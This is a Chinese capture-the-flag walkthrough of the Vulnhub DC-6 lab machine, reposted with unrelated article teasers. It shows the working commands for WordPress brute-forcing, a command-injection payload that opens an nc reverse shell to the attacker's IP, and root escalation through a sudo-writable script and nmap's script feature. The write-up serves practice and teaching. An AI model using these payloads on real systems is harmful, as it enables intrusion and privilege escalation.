Vulnhub-DC-6 靶機復現完整過程

一、搭建環境

kali充當攻擊機 ip地址是:192.168.200.14
DC-6充當靶機 : IP地址暫時未知

注意:讓兩臺機器的使用同一種網絡適配器

二、信息收集

1.探索同網段存活的主機、

①第一種方法

arp-scan -l

image.png②第二種方法

netdiscover -i eth0 -r 192.168.200.0/24

image.png
③第三種方法

nmap -sP 192.168.200.0/24 -T4 

image.png

2、開放端口信息

nmap -sS -A 192.168.200.7 -p 1-65535

image.png
80端口和22端口開放,登錄網頁
應該是被重定向,在kali當中找到hosts文件,將192.168.200.7 wordy的關系寫入進去
image.png
image.png

刷新網頁后,看到網頁使用的是wordpress cms+
該靶機的CMS系統為wordpress5.1.1
image.png根據CMS版本思路:
第一:利用目錄掃描工具尋找該CMS的后臺管理系統,然后再爆破密碼和賬號,進入后臺管理系統尋找可利用的點。
利用kali工具dirb,發現后臺目錄

dirb http://192.168.200.7/  

image.png
后臺界面
image.png

3、后臺爆破

繼續爆破賬號密碼,使用針對該CMS的賬號爆破工具wpscan,猜解密碼:

wpscan --url http://wordy -e u 
#指定url,枚舉其中的用戶名

image.png
將以上用戶名保存在一個新的文件當中,user.txt

cewl根據本文生成密碼,然后再利用爆破工具暴力破解
提示信息
image.png
提示用kali自帶的字典rockyou.txt導出包含k01的密碼導出來的字典爆破(沒解壓的先解壓,我之前解壓過了)

cat /usr/share/wordlists/rockyou.txt | grep k01 > pwd.txt 

賬號和密碼都有了開始爆破

wpscan --url wordy -U user.txt -P pwd.txt

image.png
賬號:**mark **
密碼:helpdesk01
第二:在網絡上搜索該版本的漏洞,或使用searchsploit,msfconsole等工具尋找漏洞及利用方法。

登陸后臺
image.png

三、漏洞探測

這里尋找到兩個線索,
第一:該網站使用了activity monitor工具。
第二,在activity monitor目錄的tools一欄存在可注入的點
image.png
根據這兩個線索,本文又有兩個思路:
第一:既然會回傳用戶的輸入到后臺解析,那么是否可以修改數據包達到我們的目的呢?可以利用BP抓包測試。
第二:利用前文提到的漏洞掃描工具對activity monitor進行掃描,尋找歷史漏洞。

利用第一個思路,輸入qquhu.com,點擊lookup
image.png
BURP抓包測試,發現管道符后面的whoami運行了。說明此處存在漏洞。.

反彈shell

利用該漏洞反彈一個shell。
首先在kali虛擬機上開啟監聽

nc -lvvp 6666

將包改成 qq.com | nc -e /bin/bash 192.168.200.14 6666 # kali的IP地址
執行成功
image.png利用python開啟交互模式。輸入命令

python -c 'import pty;pty.spawn("/bin/bash")'

打開home目錄,查找新的線索:
在mark目錄下存在一個things-to-do文件,發現了graham的賬號密碼
image.png
然后登陸graham的賬號密碼,登陸失敗,該靶機還開啟了22端口因此嘗試ssh登錄。

ssh graham@192.168.200.7

image.png

提權

sudo -l  #嘗試sudo -l j免密登錄
User graham may run the following commands on dc-6:(jens) NOPASSWD: /home/jens/backups.sh
# 看看當前用戶擁有的權限,可以對backups.sh執行寫操作cd /home/jens
# 寫入/bin/bash,執行,切換到jens的shell
echo "/bin/bash" >> backups.sh
sudo -u jens ./backups.sh
# 發現可以以root權限執行nmapsudo -l
User jens may run the following commands on dc-6:(root) NOPASSWD: /usr/bin/nmap
#發現可以用root權限執行nmap,nmap在早期版本是可以用來提權的將提權代os.execute("/bin/sh")
寫入一個文件中。echo "os.execute('/bin/bash')" > getshell
sudo nmap --script=getshell

image.png
進入/home/jens目錄,打開backups.sh文件,里面是一個壓縮命令行,說明該文件可以運行。
image.png
image.png
可以在該文件中添加/bin/bash語句,則可以打開jens的shell了。

echo '/bin/bash' >> backups.sh #在文件中添加命令行
sudo ./backups.sh #運行失敗,因為此時是graham喲用戶
sudo -u jens ./backups.sh #-u 指定用戶

image.png
jens可以免密碼運行root權限nmap,nmap可以運行文件
image.png

nmap提權:以root的權限用nmap執行這個腳本,打開root shell的文件,再讓nmap執行

echo "os.execute('/bin/bash')" > getshell
sudo nmap --script=getshell

image.png
在root目錄下發現flag
image.png

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/210729.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/210729.shtml
英文地址,請注明出處:http://en.pswp.cn/news/210729.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

前端知識筆記(二)———Django與Ajax

特點: 異步提交 局部刷新 例子:github注冊 動態獲取用戶名實時的跟后端確認并實時的展示到前端(局部刷新) 朝后端發送請求的方式 1.瀏覽器地址欄直接輸入url回車 -----》get請求 2.a標簽的href屬性 -----》get請求 3…

Python ipaddress模塊介紹

目錄 創建 Address/Network/Interface 對象 關于IP版本的說明 IP主機地址 定義網絡 主機接口 審查 Address/Network/Interface 對象 Network 作為 Address 列表 比較運算 將IP地址與其他模塊一起使用 實例創建失敗時獲取更多詳細信息 概述 本文檔旨在簡要介紹 ipaddr…

【大數據-Hadoop】從入門到源碼編譯-概念篇

【大數據-Hadoop】從入門到源碼編譯-概念篇 Hadoop與大數據生態(一)Hadoop是什么?(二)Hadoop組成1. HDFS1.1 NameNode(nn)1.2 DataNode(dn)1.3 Secondary NameNode&#…

記一次堆內外內存問題的排查和優化

為優化淘寶帶寬成本,我們在網關 SDK(Java)統一使用 ZSTD 替代 GZIP 壓縮以獲取更高的壓縮比,從而得到更小的響應包。具體實現采用官方推薦的 zstd-jni 庫。zstd-jni 會調用 zstd 的 c 庫。 背景 在性能壓測和優化過程中&#xff0…

React和Preact 這樣處理className更優雅

React和Preact寫className,我不太習慣使用模板字符串,不好看,看起來也不直觀,寫了如下兩個庫: react-runtime-clsx 和 preact-runtime-clsx,來輔助開發,可以更方便的處理className的問題&#x…

nodejs微信小程序+python+PHP北京地鐵票務APP-計算機畢業設計推薦 -安卓

目 錄 摘 要 I ABSTRACT II 目 錄 II 第1章 緒論 1 1.1背景及意義 1 1.2 國內外研究概況 1 1.3 研究的內容 1 第2章 相關技術 3 2.1 nodejs簡介 4 2.2 express框架介紹 6 2.4 MySQL數據庫 4 第3章 系統分析 5 3.1 需求分析 5 3.2 系統可行性分析 5 3.2.1技術可行性:…

STM32F103

提示:來源正點原子,參考STM32F103 戰艦開發指南V1.3PDF資料 文章目錄 前言一、pandas是什么?二、使用步驟 1.引入庫2.讀入數據總結 前言 提示:這里可以添加本文要記錄的大概內容: 開發環境硬件普中科技,接…

C++相關閑碎記錄(6)

1、使用shared_ptr #include <iostream> #include <memory> #include <set> #include <deque> #include <algorithm> #include <string>class Item { private:std::string name;float price; public:Item(const std::string& n, floa…

【Centos】

一、Virtualbox安裝Centos 1、Virtualbox 下載地址: Virtualbox 2、Centos 下載地址: Centos 3、Virtualbox安裝Centos教程 Virtualbox安裝Centos教程: Virtualbox安裝Centos教程

光學遙感顯著目標檢測初探筆記總結

目錄 觀看地址介紹什么是顯著性目標檢測根據不同的輸入會有不同的變體(顯著性目標檢測家族)目前這個領域的挑戰 技術方案論文1(2019)論文2(2021)論文3(2022) 未來展望 觀看地址 b站鏈接 介紹 什么是顯著性目標檢測 一張圖片里最吸引注意力的部分就是顯著性物體&#xff0c;…

vue3 vue-router 導航守衛 (五)

在Vue 3中&#xff0c;導航守衛仍然是一個重要的概念&#xff0c;用于在路由切換時執行一些特定的邏輯。Vue Router提供了多個導航守衛&#xff0c;包括全局守衛、路由獨享守衛和組件內守衛。可以在路由切換時執行一些特定的邏輯&#xff0c;例如身份驗證、權限控制、數據加載等…

C++STL詳解+代碼分析+典例講解

vector 的介紹&#xff1a; 1、vector是表示可變大小數組的序列容器。 2、vector就像數組一樣&#xff0c;也采用的連續空間來存儲元素&#xff0c;這也意味著可以采用下標對vector的元素進行訪問。 3、vector與普通數組不同的是&#xff0c;vector的大小是可以動態改變的。 4、…

基于物聯網的智能倉管理系統方案

基于物聯網的智能倉管理系統方案 一、項目背景 隨著企業業務的快速發展&#xff0c;傳統的人工倉庫管理方式已經無法滿足現代企業的需求。倉庫運營效率低下、貨物出入庫錯誤、庫存不準確等問題不斷涌現。因此&#xff0c;我們提出一個基于物聯網技術的智能倉管理系統方案&…

Redis 五大經典業務問題

一 緩存穿透 緩存穿透是指當請求的數據既不在緩存中也不存在于數據庫中時&#xff0c;請求會直接穿透緩存層&#xff0c;到達數據庫層。這通常是由于惡意攻擊或者程序錯誤造成的&#xff0c;比如攻擊者故意請求不存在的大量數據&#xff0c;導致緩存不命中&#xff0c;所有的請…

智能優化算法應用:基于被囊群算法3D無線傳感器網絡(WSN)覆蓋優化 - 附代碼

智能優化算法應用&#xff1a;基于被囊群算法3D無線傳感器網絡(WSN)覆蓋優化 - 附代碼 文章目錄 智能優化算法應用&#xff1a;基于被囊群算法3D無線傳感器網絡(WSN)覆蓋優化 - 附代碼1.無線傳感網絡節點模型2.覆蓋數學模型及分析3.被囊群算法4.實驗參數設定5.算法結果6.參考文…

Moco框架的搭建使用

一、前言   之前一直聽mock&#xff0c;也大致了解mock的作用&#xff0c;但沒有具體去了解過如何用工具或框架實現mock&#xff0c;以及也沒有考慮過落實mock&#xff0c;因為在實際的工作中&#xff0c;很少會考慮用mock。最近在學java&#xff0c;剛好了解到moco框架是用于…

城市基礎設施智慧路燈改造的特點

智慧城市建設穩步有序推進。作為智慧城市的基礎設施&#xff0c;智能照明是智慧城市的重要組成部分&#xff0c;而叁仟智慧路燈是智慧城市理念下的新產品。隨著物聯網和智能控制技術的飛速發展&#xff0c;路燈被賦予了新的任務和角色。除了使道路照明智能化和節能化外&#xf…

安全掃描五項簡介

目錄 安掃五項 1.代碼檢測 2.主機基線 nginx合規檢查 麒麟基線 3.WEB掃描 4.滲透測試 用戶枚舉漏洞 漏洞描述 修復建議 點擊劫持漏洞 漏洞描述 修復建議 XSS漏洞 漏洞描述 修復建議 3.主機漏洞 超高危漏洞 高危漏洞 中危漏洞 低危漏洞 信息漏洞 參考信息…

用電商API接口獲取拼多多的商品詳情數據

pinduoduo.item_get_app_pro-根據ID取商品詳情原數據 公共參數 API請求地址 名稱類型必須描述keyString是調用key&#xff08;必須以GET方式拼接在URL中&#xff09;secretString是調用密鑰api_nameString是API接口名稱&#xff08;包括在請求地址中&#xff09;[item_searc…

一步一步寫線程之一簡單的開始

一、多線程 多線程不管是在前面的文章分析中還是在網上還是大書籍上&#xff0c;學習C/C多線程編程是無法繞過的&#xff0c;即使使用別人封裝好的框架&#xff0c;包括使用STL的一些庫&#xff0c;如果僅僅是簡單的應用&#xff0c;可能也就過去了。不過&#xff0c;稍微復雜…